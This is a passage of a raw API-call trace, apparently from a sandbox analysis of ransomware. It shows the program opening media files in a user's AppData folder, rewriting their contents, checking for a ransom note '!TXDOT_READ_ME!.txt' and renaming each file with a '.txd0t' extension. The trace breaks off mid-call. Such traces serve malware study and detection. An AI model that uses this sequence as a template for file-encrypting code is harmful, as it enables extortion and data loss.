returned 1 [0072.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cv28-ixq4k3kd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.245] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=86535) returned 1 [0072.245] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.245] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.245] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffeabf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.245] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x15200, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x15200, lpOverlapped=0x0) returned 1 [0072.247] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffeae00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.247] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x15200, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x15200, lpOverlapped=0x0) returned 1 [0072.247] FlushFileBuffers (hFile=0x468) returned 1 [0072.262] GetProcessHeap () returned 0xe30000 [0072.262] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1fe8 [0072.263] StrCpyW (in: psz1=0xed1fe8, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv" [0072.263] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv") returned="cv28-Ixq4k3KD.mkv" [0072.263] StrCpyW (in: psz1=0xed2030, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.263] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.263] GetProcessHeap () returned 0xe30000 [0072.263] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1fe8 | out: hHeap=0xe30000) returned 1 [0072.263] CloseHandle (hObject=0x468) returned 1 [0072.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cv28-ixq4k3kd.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\cv28-Ixq4k3KD.mkv.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cv28-ixq4k3kd.mkv.txd0t")) returned 1 [0072.266] SetEvent (hEvent=0x3f8) returned 1 [0072.266] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.273] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp" [0072.273] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t" [0072.273] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t") returned 0 [0072.273] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp", dwFileAttributes=0x80) returned 1 [0072.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dvme9qftb1fe2h.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0072.274] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=82575) returned 1 [0072.274] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.274] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.275] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffebb71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.275] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x14280, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x14280, lpOverlapped=0x0) returned 1 [0072.276] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xfffebd80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.277] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x14280, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x14280, lpOverlapped=0x0) returned 1 [0072.277] FlushFileBuffers (hFile=0x47c) returned 1 [0072.293] GetProcessHeap () returned 0xe30000 [0072.293] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1ec0 [0072.293] StrCpyW (in: psz1=0xed1ec0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp" [0072.293] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp") returned="DVmE9qFtb1fE2H.bmp" [0072.293] StrCpyW (in: psz1=0xed1f08, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.293] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.293] GetProcessHeap () returned 0xe30000 [0072.293] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1ec0 | out: hHeap=0xe30000) returned 1 [0072.293] CloseHandle (hObject=0x47c) returned 1 [0072.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dvme9qftb1fe2h.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DVmE9qFtb1fE2H.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dvme9qftb1fe2h.bmp.txd0t")) returned 1 [0072.296] SetEvent (hEvent=0x3f8) returned 1 [0072.296] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.302] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi" [0072.302] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t" [0072.302] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t") returned 0 [0072.302] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi", dwFileAttributes=0x80) returned 1 [0072.302] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\j9q4p.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.303] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=95064) returned 1 [0072.303] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.303] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.303] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe8aa8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.303] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x17350, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x17350, lpOverlapped=0x0) returned 1 [0072.305] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffe8cb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.305] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x17350, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x17350, lpOverlapped=0x0) returned 1 [0072.305] FlushFileBuffers (hFile=0x474) returned 1 [0072.321] GetProcessHeap () returned 0xe30000 [0072.321] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0072.321] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi" [0072.321] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi") returned="j9Q4P.avi" [0072.321] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.321] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.321] GetProcessHeap () returned 0xe30000 [0072.321] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.321] CloseHandle (hObject=0x474) returned 1 [0072.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\j9q4p.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\j9Q4P.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\j9q4p.avi.txd0t")) returned 1 [0072.324] SetEvent (hEvent=0x3f8) returned 1 [0072.324] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.330] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv" [0072.330] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t" [0072.330] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t") returned 0 [0072.330] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv", dwFileAttributes=0x80) returned 1 [0072.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mfz6anqkv94_rr.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.330] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=89696) returned 1 [0072.331] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.331] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.331] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9fa0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.331] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x15e60, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x15e60, lpOverlapped=0x0) returned 1 [0072.333] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffea1a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.333] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x15e60, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x15e60, lpOverlapped=0x0) returned 1 [0072.333] FlushFileBuffers (hFile=0x468) returned 1 [0072.344] GetProcessHeap () returned 0xe30000 [0072.344] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1580 [0072.344] StrCpyW (in: psz1=0xed1580, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv" [0072.344] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv") returned="mFz6aNQKv94_Rr.mkv" [0072.344] StrCpyW (in: psz1=0xed15c8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.344] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.344] GetProcessHeap () returned 0xe30000 [0072.344] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1580 | out: hHeap=0xe30000) returned 1 [0072.344] CloseHandle (hObject=0x468) returned 1 [0072.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mfz6anqkv94_rr.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mfz6anqkv94_rr.mkv.txd0t")) returned 1 [0072.347] SetEvent (hEvent=0x3f8) returned 1 [0072.347] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.462] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav" [0072.462] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t" [0072.462] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t") returned 0 [0072.462] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav", dwFileAttributes=0x80) returned 1 [0072.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pdhyzrp.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0072.463] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=59763) returned 1 [0072.463] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.463] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.464] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff148d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.464] ReadFile (in: hFile=0x47c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xe970, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xe970, lpOverlapped=0x0) returned 1 [0072.465] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff1690, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.465] WriteFile (in: hFile=0x47c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xe970, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xe970, lpOverlapped=0x0) returned 1 [0072.466] FlushFileBuffers (hFile=0x47c) returned 1 [0072.476] GetProcessHeap () returned 0xe30000 [0072.476] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0072.476] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav" [0072.476] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav") returned="PDHYzrp.wav" [0072.476] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.476] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.477] GetProcessHeap () returned 0xe30000 [0072.477] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.477] CloseHandle (hObject=0x47c) returned 1 [0072.478] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pdhyzrp.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pdhyzrp.wav.txd0t")) returned 1 [0072.479] SetEvent (hEvent=0x3f8) returned 1 [0072.479] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.490] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3" [0072.490] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t" [0072.490] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t") returned 0 [0072.490] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3", dwFileAttributes=0x80) returned 1 [0072.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qswrg_kb.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.491] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=101171) returned 1 [0072.491] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.491] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0072.491] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe72cd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.491] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x18b30, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x18b30, lpOverlapped=0x0) returned 1 [0072.493] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe74d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.493] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x18b30, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x18b30, lpOverlapped=0x0) returned 1 [0072.494] FlushFileBuffers (hFile=0x468) returned 1 [0072.508] GetProcessHeap () returned 0xe30000 [0072.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0072.508] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3" [0072.508] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3") returned="QsWrg_KB.mp3" [0072.508] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.508] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.508] GetProcessHeap () returned 0xe30000 [0072.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.508] CloseHandle (hObject=0x468) returned 1 [0072.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qswrg_kb.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\QsWrg_KB.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\qswrg_kb.mp3.txd0t")) returned 1 [0072.511] SetEvent (hEvent=0x3f8) returned 1 [0072.511] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0072.516] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv" [0072.516] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\sT1K.flv", psz2=".txd0t" | out: 